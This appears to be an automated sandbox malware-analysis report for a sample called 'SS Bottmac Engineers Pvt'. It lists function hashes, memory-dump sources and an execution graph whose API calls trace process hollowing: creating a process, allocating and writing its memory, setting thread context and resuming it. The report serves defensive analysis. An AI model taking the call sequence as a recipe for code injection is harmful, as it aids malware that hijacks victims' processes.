                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0164B59E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d8067719611afbcf190c966faad52fcbdab3fcea139e1ea9a5902ce64743e0b8
                                • Instruction ID: cb14e64339ec5dcc1a3c28fd4255fc0134391ef3949fb3e60c80b531846901a7
                                • Opcode Fuzzy Hash: d8067719611afbcf190c966faad52fcbdab3fcea139e1ea9a5902ce64743e0b8
                                • Instruction Fuzzy Hash: D611DFB5C002498FDB24DF9AC844A9EFBF4AB88314F14841AD919A7710D379A545CFA5
                                Function 093E1271 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 093E12D5
                                Memory Dump Source
                                • Source File: 00000016.00000002.2399342950.00000000093E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_93e0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 827c4da0ce6af0c295c8e028a32083f44c4162a32acf8bd06f113144912f2467
                                • Instruction ID: ab8fa856570a66ca1233f4cc61223461ba1d1d593fd0410719562c734374f997
                                • Opcode Fuzzy Hash: 827c4da0ce6af0c295c8e028a32083f44c4162a32acf8bd06f113144912f2467
                                • Instruction Fuzzy Hash: 2D11F2B58002498FDB20CF9AC885BEEBFF4FB48314F10841AE558A3650C379A544CFA5
                                Function 093E1278 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 093E12D5
                                Memory Dump Source
                                • Source File: 00000016.00000002.2399342950.00000000093E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_93e0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 8ce7ea82a080ed313612f5b364ee8654d5f3e7fa559b033e85b65f3e31cb9990
                                • Instruction ID: f7364d83e1863e58b96aca8b2d39559e64c4b227fbcb4804e52ad0e5cdf5378d
                                • Opcode Fuzzy Hash: 8ce7ea82a080ed313612f5b364ee8654d5f3e7fa559b033e85b65f3e31cb9990
                                • Instruction Fuzzy Hash: 5911D3B58003499FDB10DF9AC845BEEBBF8FB48314F10841AE518A7650C379A544CFA5
                                Function 015AD4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386301410.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15ad000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 700ea772207be431526ce6c5750c0b63a78879d8fd0a98d568cf685001e43ce5
                                • Instruction ID: dc27fc40f89a954521eed7c6e06127e4503945273c110390798eb8dd3fb33a0b
                                • Opcode Fuzzy Hash: 700ea772207be431526ce6c5750c0b63a78879d8fd0a98d568cf685001e43ce5
                                • Instruction Fuzzy Hash: 5021F171580240DFDB05EF58D9C0B2EBFB5FB88318F64C569E9490E656C33AD416CAA2
                                Function 015BD01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d2586e711b15209c7f108ab12f693c184d0545bd22edf798961406e2ae794ed3
                                • Instruction ID: 976e7aca8ea4d05571d465836539776e7e3f6f92a6f02d67766c73306c465e71
                                • Opcode Fuzzy Hash: d2586e711b15209c7f108ab12f693c184d0545bd22edf798961406e2ae794ed3
                                • Instruction Fuzzy Hash: 26210075604208DFCB15DFA8D9C0B26BFB5FB88318F20C969D90A0F256D33AD406CA61
                                Function 015BD1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8669712101873e2885b778b635fec3291a9c7ba26dab8464523ee891dafb12d
                                • Instruction ID: fcd54f9b77e795fd4581ec2e2f72781382d18d5416519ad430833673966ec873
                                • Opcode Fuzzy Hash: c8669712101873e2885b778b635fec3291a9c7ba26dab8464523ee891dafb12d
                                • Instruction Fuzzy Hash: 3921D3715042449FDB05DF98D5C0B66FBB5FB84328F20C96DD9094F256C33AD406CA61
                                Function 015BD006 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72e653d5be1d978851f5992de2ba29d7f62cd0b41f430c60013b91a9aa3b92fc
                                • Instruction ID: f01c5e1d27a1b252857d1bbb0834f4686c9f6461652659de8fe88dbb1b924a42
                                • Opcode Fuzzy Hash: 72e653d5be1d978851f5992de2ba29d7f62cd0b41f430c60013b91a9aa3b92fc
                                • Instruction Fuzzy Hash: 94216A755093848FDB02CF24D994715BF71FB46218F28C5EAD8498F2A7C33A980ACB62
                                Function 015AD4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386301410.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15ad000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: e77f80e7d5c281043baeaf7460adcf0a98bd5df54d2462e404f0323783496bcc
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: FA11DF72444280CFCB02DF54D5C4B1ABF71FB88314F24C6A9D9490F656C33AD45ADBA2
                                Function 015BD1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 890b2e3d2453aebee30918dd14e4dbac47e80c38a746c85c52bbf13739359c4b
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 5511BB75504280DFDB02CF54C5C4B19FFB1FB84228F24C6A9D8494F296C33AD40ACB62

                                Executed Functions

                                Function 00C413E0 Relevance: 4.2, Strings: 3, Instructions: 442COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: cab06ab74b14adb1167b9440b0822c3190f17b395ecc25cf20a1a3e1f9d0117b
                                • Instruction ID: becd5e887c56c701898dceb4c17c4422573bfddd478779a79f3912e1040445d9
                                • Opcode Fuzzy Hash: cab06ab74b14adb1167b9440b0822c3190f17b395ecc25cf20a1a3e1f9d0117b
                                • Instruction Fuzzy Hash: CFF18F347002058FDB19EF79D958B6E7BA6BF88700F148528E90A9B3E5DF759C42CB81
                                Function 00C413D0 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 1e082e34592763a6d552ac22d36133213444e3b5a124f5d36ff2829e3d619c7c
                                • Instruction ID: 774b2adb2344a15d897fec85b8eed2f5cc25ba9ff5129effa2be7e35c38d80db
                                • Opcode Fuzzy Hash: 1e082e34592763a6d552ac22d36133213444e3b5a124f5d36ff2829e3d619c7c
                                • Instruction Fuzzy Hash: 04C190357002018FDB19EF75D898B6E77A7BF88740F148528D80A9B3A9DF759C46CB81
                                Function 00C414C2 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: cffd5eb7e2bd5b821fad865cdd261a085c62e9b817c7493d5a2db76ea7419e10
                                • Instruction ID: cca8a5d339bb7889395f93458867f690a33a812886fb6a540c618315b9c1ea1a
                                • Opcode Fuzzy Hash: cffd5eb7e2bd5b821fad865cdd261a085c62e9b817c7493d5a2db76ea7419e10
                                • Instruction Fuzzy Hash: 2EA1BF317003018FDB19EF79D854B6E76A7BF88740F248928E84A9B3E5DF759C428B91
                                Function 00C40E00 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: fd03c8d23b414d46856a52ff17ea9a1691ac451aac301f615cbab0db2f4cdfa3
                                • Instruction ID: f9c057708ff2bc1fd2732204c19aa6b75ca9d876fb19cb6910d10fa7b4a3b0ab
                                • Opcode Fuzzy Hash: fd03c8d23b414d46856a52ff17ea9a1691ac451aac301f615cbab0db2f4cdfa3
                                • Instruction Fuzzy Hash: 2221F630B002158FCB59EB79855463E7BF2BFC9704B2488A9D549DB396DE34DD02C792
                                Function 00C40DF0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 3fbc8786fca7ca4746a0eb7bbd9ff47115a6d2bccfff43bea0bb8db5a6a64404
                                • Instruction ID: 44ccf21e8a7593e765270f8d8eec54bc311cb5e166a9101bb07a41a548130c5f
                                • Opcode Fuzzy Hash: 3fbc8786fca7ca4746a0eb7bbd9ff47115a6d2bccfff43bea0bb8db5a6a64404
                                • Instruction Fuzzy Hash: 45213730B042569FCB55EB78885067E7BF3BFC5704B284469D08ADB39ADE34DD028392
                                Function 00C40901 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 45cc94c955284d0155c809f78f7724d2e430a3dbb74c762c8484c6477d245b4f
                                • Instruction ID: e6f337492791d4a8002bb01b48b564bdf69f838ce560ebfdd8e1c1297ca8d77d
                                • Opcode Fuzzy Hash: 45cc94c955284d0155c809f78f7724d2e430a3dbb74c762c8484c6477d245b4f
                                • Instruction Fuzzy Hash: D521CF30E482488FCB49EFB898643AE7FB1AF85300F1140FAC448DB696EB344E05C781
                                Function 00C40CE0 Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a611e80274c5684af272e12aeb3e5fd49b0f83b564aa7045bbb4411697730f5
                                • Instruction ID: 51ef4d33472aed149f20d361aa6f1d1b8fe37e1627977af1e9aba4c68a2b6d89
                                • Opcode Fuzzy Hash: 4a611e80274c5684af272e12aeb3e5fd49b0f83b564aa7045bbb4411697730f5
                                • Instruction Fuzzy Hash: EB31E771B442058FCB04EFBA99543AEBEEAEFC6340F144869D44AC3396DE384D0687A1
                                Function 00C40BC9 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f720c1bc9254502e849d84e3b0d57b8ca1e0c2e9017820b5664b0e21f14ce15e
                                • Instruction ID: 8b0367f82e56ef6b81e2829c55e7e226edd21d6bdcf5a19a4aa64e92d0cffa17
                                • Opcode Fuzzy Hash: f720c1bc9254502e849d84e3b0d57b8ca1e0c2e9017820b5664b0e21f14ce15e
                                • Instruction Fuzzy Hash: A1319374A04305DFCF05EFB4E98069DBBB6FF85300F1049A9D045AB259DB34AA45CF51
                                Function 00C40BD8 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4927483f9ccd40dcc748c5046b5be182f1fd0932fbecfb2159f87ce9a7f67d35
                                • Instruction ID: 029c61702b2f6f7d37afad16aa6faccff6906a3329fcf027cd3015dd83b8de54
                                • Opcode Fuzzy Hash: 4927483f9ccd40dcc748c5046b5be182f1fd0932fbecfb2159f87ce9a7f67d35
                                • Instruction Fuzzy Hash: FB214F74904309DFCB05EFB4E984AADBBBAFF84300F104969D405AB359EB34AA85CB51
                                Function 00C40838 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf91a9ab46c0dbaeed9da58d8f4201b27bba7cae653f3acb39a8f218a7db2aa4
                                • Instruction ID: 1f61110f38296987c44a59b2875e66998063a6e1f34ec8787292ea9b73eb005c
                                • Opcode Fuzzy Hash: cf91a9ab46c0dbaeed9da58d8f4201b27bba7cae653f3acb39a8f218a7db2aa4
                                • Instruction Fuzzy Hash: 2D113D3425D3459FCB06EF28F994A453BB9EB557007005AA4D0488F23ED774A98ACB80
                                Function 00C41300 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5896108214d393102e1cc53d32681f4cfb6ffba41005ab90513b404c018c2479
                                • Instruction ID: f1eb19c038ba3f1a6a148e857bd73873f44ec7738867d0f5ffde4dfe59f5827f
                                • Opcode Fuzzy Hash: 5896108214d393102e1cc53d32681f4cfb6ffba41005ab90513b404c018c2479
                                • Instruction Fuzzy Hash: C6110034D00109EFCF45EFA8EA8159EBBB9FF45304B108A69D519A7266DB306A46CF40
                                Function 00C40848 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 872fbb1240a7702ae07803fd8e8c48a94ac2a888dcb65aba6dbfdf39347c63ec
                                • Instruction ID: dfa601e8821460fa23792f3023bb309818471292032873e5c931cd144d4a928d
                                • Opcode Fuzzy Hash: 872fbb1240a7702ae07803fd8e8c48a94ac2a888dcb65aba6dbfdf39347c63ec
                                • Instruction Fuzzy Hash: 6901DB342583059FCB0AFF58F984E4577ADFB54744B009A6490488F23DD774A98ACF80

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:181
                                Total number of Limit Nodes:9
                                execution_graph 28820 ec80ff8 28821 ec81183 28820->28821 28822 ec8101e 28820->28822 28822->28821 28825 ec81278 PostMessageW 28822->28825 28827 ec81270 PostMessageW 28822->28827 28826 ec812e4 28825->28826 28826->28822 28828 ec812e4 28827->28828 28828->28822 28588 177d5e0 28589 177d626 GetCurrentProcess 28588->28589 28591 177d671 28589->28591 28592 177d678 GetCurrentThread 28589->28592 28591->28592 28593 177d6b5 GetCurrentProcess 28592->28593 28594 177d6ae 28592->28594 28595 177d6eb 28593->28595 28594->28593 28596 177d713 GetCurrentThreadId 28595->28596 28597 177d744 28596->28597 28677 7aadb00 28678 7aadb22 28677->28678 28679 7aadc69 28678->28679 28681 7aaf91a 28678->28681 28682 7aaf922 28681->28682 28683 7aaf942 28681->28683 28682->28678 28684 7aaf98e 28683->28684 28699 ec807a9 28683->28699 28704 ec80833 28683->28704 28709 ec802f3 28683->28709 28714 ec80753 28683->28714 28719 ec80891 28683->28719 28723 ec80911 28683->28723 28727 ec806d1 28683->28727 28732 ec8049d 28683->28732 28737 ec80858 28683->28737 28741 ec80107 28683->28741 28746 ec80567 28683->28746 28753 ec80521 28683->28753 28758 ec8066f 28683->28758 28763 ec803ed 28683->28763 28684->28678 28700 ec807ad 28699->28700 28701 ec80947 28700->28701 28768 7aad4e9 28700->28768 28772 7aad4f0 28700->28772 28705 ec807f0 28704->28705 28706 ec8078f 28704->28706 28707 7aad4e9 WriteProcessMemory 28705->28707 28708 7aad4f0 WriteProcessMemory 28705->28708 28706->28684 28707->28706 28708->28706 28710 ec80313 28709->28710 28776 7aace68 28710->28776 28780 7aace70 28710->28780 28711 ec809ab 28711->28684 28715 ec80759 28714->28715 28717 7aace68 ResumeThread 28715->28717 28718 7aace70 ResumeThread 28715->28718 28716 ec809ab 28716->28684 28717->28716 28718->28716 28721 7aad4e9 WriteProcessMemory 28719->28721 28722 7aad4f0 WriteProcessMemory 28719->28722 28720 ec808b8 28721->28720 28722->28720 28725 7aad4e9 WriteProcessMemory 28723->28725 28726 7aad4f0 WriteProcessMemory 28723->28726 28724 ec80947 28725->28724 28726->28724 28728 ec806d7 28727->28728 28730 7aace68 ResumeThread 28728->28730 28731 7aace70 ResumeThread 28728->28731 28729 ec809ab 28729->28684 28730->28729 28731->28729 28733 ec804aa 28732->28733 28735 7aad4e9 WriteProcessMemory 28733->28735 28736 7aad4f0 WriteProcessMemory 28733->28736 28734 ec80811 28734->28684 28735->28734 28736->28734 28784 7aacf18 28737->28784 28788 7aacf20 28737->28788 28738 ec80872 28742 ec80111 28741->28742 28792 7aad778 28742->28792 28796 7aad76c 28742->28796 28749 7aacf18 Wow64SetThreadContext 28746->28749 28750 7aacf20 Wow64SetThreadContext 28746->28750 28747 ec80313 28748 ec809ab 28747->28748 28751 7aace68 ResumeThread 28747->28751 28752 7aace70 ResumeThread 28747->28752 28748->28684 28748->28748 28749->28747 28750->28747 28751->28748 28752->28748 28754 ec8063e 28753->28754 28800 7aad429 28754->28800 28804 7aad430 28754->28804 28755 ec8065c 28759 ec8067f 28758->28759 28760 ec80947 28759->28760 28761 7aad4e9 WriteProcessMemory 28759->28761 28762 7aad4f0 WriteProcessMemory 28759->28762 28761->28760 28762->28760 28764 ec804dd 28763->28764 28808 7aad5d9 28764->28808 28812 7aad5e0 28764->28812 28765 ec80257 28765->28684 28769 7aad538 WriteProcessMemory 28768->28769 28771 7aad58f 28769->28771 28771->28701 28773 7aad538 WriteProcessMemory 28772->28773 28775 7aad58f 28773->28775 28775->28701 28777 7aaceb0 ResumeThread 28776->28777 28779 7aacee1 28777->28779 28779->28711 28781 7aaceb0 ResumeThread 28780->28781 28783 7aacee1 28781->28783 28783->28711 28785 7aacf20 Wow64SetThreadContext 28784->28785 28787 7aacfad 28785->28787 28787->28738 28789 7aacf65 Wow64SetThreadContext 28788->28789 28791 7aacfad 28789->28791 28791->28738 28793 7aad801 28792->28793 28793->28793 28794 7aad966 CreateProcessA 28793->28794 28795 7aad9c3 28794->28795 28797 7aad801 28796->28797 28797->28797 28798 7aad966 CreateProcessA 28797->28798 28799 7aad9c3 28798->28799 28801 7aad470 VirtualAllocEx 28800->28801 28803 7aad4ad 28801->28803 28803->28755 28805 7aad470 VirtualAllocEx 28804->28805 28807 7aad4ad 28805->28807 28807->28755 28809 7aad62b ReadProcessMemory 28808->28809 28811 7aad66f 28809->28811 28811->28765 28813 7aad62b ReadProcessMemory 28812->28813 28815 7aad66f 28813->28815 28815->28765 28816 7aade00 28817 7aadb94 28816->28817 28818 7aadc69 28817->28818 28819 7aaf91a 12 API calls 28817->28819 28819->28817 28598 1774668 28599 177467a 28598->28599 28600 1774686 28599->28600 28604 1774778 28599->28604 28609 1774204 28600->28609 28602 17746a5 28605 177479d 28604->28605 28613 1774888 28605->28613 28617 1774878 28605->28617 28606 17747a7 28606->28600 28610 177420f 28609->28610 28625 17759fc 28610->28625 28612 1777084 28612->28602 28614 17748af 28613->28614 28615 177498c 28614->28615 28621 1774560 28614->28621 28615->28606 28619 1774888 28617->28619 28618 177498c 28618->28606 28619->28618 28620 1774560 CreateActCtxA 28619->28620 28620->28618 28622 1775d18 CreateActCtxA 28621->28622 28624 1775ddb 28622->28624 28626 1775a07 28625->28626 28629 1775a1c 28626->28629 28628 1777425 28628->28612 28630 1775a27 28629->28630 28633 1775a4c 28630->28633 28632 1777502 28632->28628 28634 1775a57 28633->28634 28637 1775a7c 28634->28637 28636 1777605 28636->28632 28638 1775a87 28637->28638 28640 1778b6b 28638->28640 28643 177ae10 28638->28643 28639 1778ba9 28639->28636 28640->28639 28646 177cf00 28640->28646 28651 177b250 28643->28651 28647 177cf31 28646->28647 28648 177cf55 28647->28648 28659 177d4b9 28647->28659 28663 177d4c8 28647->28663 28648->28639 28654 177b33a 28651->28654 28652 177ae26 28652->28640 28655 177b37c 28654->28655 28657 177b359 28654->28657 28655->28652 28656 177b580 GetModuleHandleW 28658 177b5ad 28656->28658 28657->28655 28657->28656 28658->28652 28661 177d4c8 28659->28661 28660 177d50f 28660->28648 28661->28660 28667 177d2f0 28661->28667 28664 177d4d5 28663->28664 28665 177d2f0 GetModuleHandleW 28664->28665 28666 177d50f 28664->28666 28665->28666 28666->28648 28668 177d2fb 28667->28668 28670 177de20 28668->28670 28671 177d40c 28668->28671 28670->28670 28672 177d417 28671->28672 28673 1775a7c GetModuleHandleW 28672->28673 28674 177de8f 28673->28674 28674->28670 28675 177d828 DuplicateHandle 28676 177d8be 28675->28676

                                Executed Functions

                                Function 0177D5D0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 295 177d5d0-177d66f GetCurrentProcess 299 177d671-177d677 295->299 300 177d678-177d6ac GetCurrentThread 295->300 299->300 301 177d6b5-177d6e9 GetCurrentProcess 300->301 302 177d6ae-177d6b4 300->302 304 177d6f2-177d70d call 177d7b1 301->304 305 177d6eb-177d6f1 301->305 302->301 308 177d713-177d742 GetCurrentThreadId 304->308 305->304 309 177d744-177d74a 308->309 310 177d74b-177d7ad 308->310 309->310
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0177D65E
                                • GetCurrentThread.KERNEL32 ref: 0177D69B
                                • GetCurrentProcess.KERNEL32 ref: 0177D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0177D731
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 2706bb0aca7d54f2e4e96cdad595c26d45b59d5c89ac5bfc3f06338136cae8be
                                • Instruction ID: e1aa7bb928d4f272967d54ed64fdda50c3f013962ca99285ba9d74e4acd71e59
                                • Opcode Fuzzy Hash: 2706bb0aca7d54f2e4e96cdad595c26d45b59d5c89ac5bfc3f06338136cae8be
                                • Instruction Fuzzy Hash: 805165B09102498FDB14DFAAD548BEEBFF1EF49304F20C469D509A7260D7385984CB65
                                Function 0177D5E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 317 177d5e0-177d66f GetCurrentProcess 321 177d671-177d677 317->321 322 177d678-177d6ac GetCurrentThread 317->322 321->322 323 177d6b5-177d6e9 GetCurrentProcess 322->323 324 177d6ae-177d6b4 322->324 326 177d6f2-177d70d call 177d7b1 323->326 327 177d6eb-177d6f1 323->327 324->323 330 177d713-177d742 GetCurrentThreadId 326->330 327->326 331 177d744-177d74a 330->331 332 177d74b-177d7ad 330->332 331->332
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0177D65E
                                • GetCurrentThread.KERNEL32 ref: 0177D69B
                                • GetCurrentProcess.KERNEL32 ref: 0177D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0177D731
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 81852f888330ee08a2e86f62a4a92818e2edb7f020bd27e52f67479c17a9b8aa
                                • Instruction ID: 2600cfe33f836496f77b8bbbb203e8cc9d171255cdba92cb27a5d9cc5aaeea7e
                                • Opcode Fuzzy Hash: 81852f888330ee08a2e86f62a4a92818e2edb7f020bd27e52f67479c17a9b8aa
                                • Instruction Fuzzy Hash: E85143B09112498FDB14DFAAD548BEEFBF1FF89304F20C069D509A7260D778A884CB65
                                Function 07AAD76C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
